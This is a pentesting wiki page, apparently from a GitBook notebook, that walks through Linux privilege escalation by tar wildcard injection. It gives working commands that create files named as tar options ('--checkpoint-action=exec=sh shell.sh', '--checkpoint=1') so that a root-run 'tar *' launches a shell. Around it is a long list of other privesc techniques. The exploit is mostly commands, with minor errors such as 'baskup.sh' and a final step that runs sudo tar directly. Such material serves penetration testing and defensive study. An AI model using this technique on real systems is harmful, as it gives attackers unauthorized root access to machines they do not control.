Linux Privilege Escalation
  • Ansible Playbook Privilege Escalation
  • Apache Conf Privilege Escalation
  • Bash eq Privilege Escalation
  • Buffer Overflow Privilege Escalation
  • Chrome Remote Debugger Pentesting
  • Doas Privilege Escalation
  • Ghidra Debug Mode RCE
  • Gnuplot Privilege Escalation
  • LXC/LXD (Linux Container/Daemon) Privilege Escalation
  • Linux Privilege Escalation
  • Mozilla Pentesting
  • OpenSSL Privilege Escalation
  • Pip Download Code Execution
  • PolKit Privilege Escalation
  • Python Eval Code Execution
  • Python Jails Escape
  • Python Privilege Escalation
  • Python Yaml Privilege Escalation
  • Ruby Privilege Escalation
  • Rust Privilege Escalation
  • SSSD Privilege Escalation
  • Shared Library Hijacking
  • Snapd Privilege Escalation
  • Sudo ClamAV Privilege Escalation
  • Sudo Dstat Privilege Escalation
  • Sudo Exiftool Privilege Escalation
  • Sudo Fail2ban Privilege Escalation
  • Sudo Git Privilege Escalation
  • Sudo Java Privilege Escalation
  • Sudo OpenVPN Privilege Escalation
  • Sudo Path Traversal Privilege Escalation
  • Sudo Privilege Escalation
  • Sudo Privilege Escalation by Overriding Shared Library
  • Sudo Reboot Privilege Escalation
  • Sudo Screen Privilege Escalation
  • Sudo Service Privilege Escalation
  • Sudo Shutdown, Poweroff Privilege Escalation
  • Sudo Systemctl Privilege Escalation
  • Sudo Tee Privilege Escalation
  • Sudo Umount Privilege Escalation
  • Sudo Vim Privilege Escalation
  • Sudo Wall Privilege Escalation
  • Sudo Wget Privilege Escalation
  • Sudoedit Privilege Escalation
  • Tar Wildcard Injection PrivEsc
  • Update-Motd Privilege Escalation
  • irb (Interactive Ruby Shell) Privilege Escalation
  • Linux Backdoors
  • Linux Pivoting
  • Post eploitation
Powered by GitBook
On this page
  • Investigation
  • Exploitation

Tar Wildcard Injection PrivEsc

Tar command with wildcard injection may lead to privilege escalation (PrivEsc).

PreviousSudoedit Privilege EscalationNextUpdate-Motd Privilege Escalation

Last updated 1 year ago

For example, below command can be executed as root.

sudo -l

(root) NOPASSWD: /opt/backup/baskup.sh
Copied!

We need to check the content in the file.

cat /opt/backup/backup.sh

# -cf: create an archived file
tar -cf backup.tar *
Copied!

The above tar command means that it creates an arvhived file from any input file because it passes wildcard (*).

Now create a payload for privilege escalation.

cd /opt/backup
echo -e '#!/bin/bash\n/bin/bash' > shell.sh
echo "" > "--checkpoint-action=exec=sh shell.sh"
echo "" > --checkpoint=1
Copied!

We've created three files.

ls /opt/backup

shell.sh  '--checkpoint-action=exec=sh shell.sh'  '--checkpoint=1'
Copied!

Now execute "tar" command as root with wildcard.

sudo tar -cf example.tar *
Copied!

Wait until "tar" command will be executed. After a while, we should see the current user switch to root.

whoami
root
Investigation
Check If the File Contains Tar Command with Wildcards
Exploitation
Page cover image